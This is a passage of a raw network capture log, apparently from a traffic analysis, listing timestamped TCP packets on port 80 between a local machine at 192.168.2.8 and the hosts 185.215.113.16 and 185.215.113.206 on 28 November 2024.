                                                  Nov 28, 2024 13:11:02.521087885 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.521125078 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.522125006 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.522195101 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.522197962 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.522233009 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.523291111 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.523336887 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.523423910 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.523475885 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.524383068 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.524437904 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.524465084 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.524547100 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.525527000 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.525547981 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.525587082 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.525587082 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.526699066 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.526725054 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.526755095 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.526798964 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.527801991 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.527920961 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.527923107 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.527971029 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.528985977 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.529063940 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.529155970 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.529208899 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.530071974 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.530119896 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.530170918 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.530245066 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.531217098 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.531316996 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.531320095 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.531363964 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.532341003 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.532398939 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.532443047 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.532497883 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.533502102 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.533615112 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.533628941 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.533678055 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.534650087 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.534714937 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.534792900 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.534837961 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.535758972 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.535814047 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.535856962 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.535952091 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.536955118 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.537012100 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.537045956 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.537112951 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.538058996 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.538104057 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.538153887 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.538224936 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.539166927 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.539227962 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.539283037 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.539333105 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.540307045 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.540380001 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.540425062 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.540513992 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.541438103 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.541538000 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.541562080 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.541583061 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.542598009 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.542681932 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.542716980 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.542768002 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.543772936 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.543823004 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.543869019 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.543912888 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.544897079 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.544949055 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.544991970 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.545104980 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.546046019 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.546101093 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.546140909 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.546200037 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.547200918 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.547262907 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.547297001 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.547338009 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.548295021 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.548398972 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.548403978 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.548455000 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.549462080 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.549510956 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.549597979 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.549674034 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.550544024 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.550596952 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.550673008 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.550724983 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.551691055 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.551768064 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.551798105 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.551843882 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.552854061 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.552916050 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.552958012 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.553020954 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.553972960 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.554024935 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.554065943 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.554117918 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.555217028 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.555269957 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.555351973 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.555419922 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.556303978 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.556366920 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.556384087 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.556402922 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.557382107 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.557430983 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.557473898 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.557564020 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.558540106 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.558614969 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.558660030 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.558710098 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.559659958 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.559711933 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.559762001 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.559803009 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.560914040 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.560977936 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.561032057 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.561077118 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.561940908 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.562000990 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.562041044 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.562127113 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.563085079 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.563129902 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.563174009 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.563215971 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.564244032 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.564315081 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.650651932 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:11:02.650724888 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:11:02.689160109 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.689208984 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.689295053 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.689322948 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.689673901 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.689735889 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.689769030 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.689814091 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.690821886 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.690900087 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.690921068 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.691037893 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.691951036 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.692058086 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.692104101 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.692156076 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.693144083 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.693206072 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.693274975 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.693329096 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.694221020 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.694295883 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.694309950 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.694340944 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.695357084 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.695379972 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.695453882 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.695453882 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.704634905 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.704705000 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.704725981 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.704756021 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.705080032 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.705127001 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.705143929 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.705173016 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.706227064 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.706284046 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.706325054 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.706372023 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.707403898 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.707432032 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.707487106 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.707529068 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.708566904 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.708616018 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.708662033 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.708712101 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.709636927 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.709671021 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.709690094 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.709733009 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.710757971 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.710810900 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.710845947 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.710906982 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.711904049 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.711978912 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.711997032 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.712049961 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.713032961 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.713083982 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.713140011 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.713193893 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.714170933 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.714222908 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.714257956 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.714312077 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.715281963 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.715332985 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.715393066 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.715459108 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.716456890 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.716527939 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.716550112 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.716608047 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.717587948 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.717641115 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.717689037 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.717737913 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.718780041 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.718847036 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.718863964 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.718961954 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.719902992 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.719959021 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.719985962 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.720124006 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.721023083 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.721101046 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.721112967 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.721201897 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.722148895 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.722214937 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.722251892 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.722301960 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.723309994 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.723403931 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.723412037 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.723453999 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.724431038 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.724493027 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.724518061 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.724601030 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.725545883 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.725596905 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.725661039 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.725711107 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.726680994 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.726762056 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.726775885 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.726828098 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.727875948 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.727910042 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.727946997 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.727979898 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.728985071 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.729065895 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.729104042 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.729154110 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.730124950 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.730199099 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.730227947 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.730366945 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.731261969 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.731329918 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.731353045 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.731420040 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.732384920 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.732486963 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.732506990 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.732542992 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.733517885 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.733604908 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.733623028 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.733695984 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.734641075 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.734714031 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.734740019 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.734785080 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.735789061 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.735872984 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.735908031 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.735964060 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.736967087 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.737039089 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.737112045 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.737190962 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.738100052 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.738172054 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.738208055 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.738270044 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.739198923 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.739252090 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.739325047 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.739372969 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.740370035 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.740418911 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.740422010 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.740544081 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.741518974 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.741600037 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.741625071 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.741698027 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.742690086 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.742742062 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.742780924 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.742835999 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.743760109 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.743824959 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.743901014 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.743988037 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.744916916 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.745001078 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.745151997 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.745213985 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.746078968 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.746139050 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.746143103 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.746201038 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.747154951 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.747242928 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.747272015 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.747308016 CET4971080192.168.2.8185.215.113.16
                                                  Nov 28, 2024 13:11:02.748321056 CET8049710185.215.113.16192.168.2.8
                                                  Nov 28, 2024 13:11:02.748379946 CET4971080192.168.2.8185.215.113.16
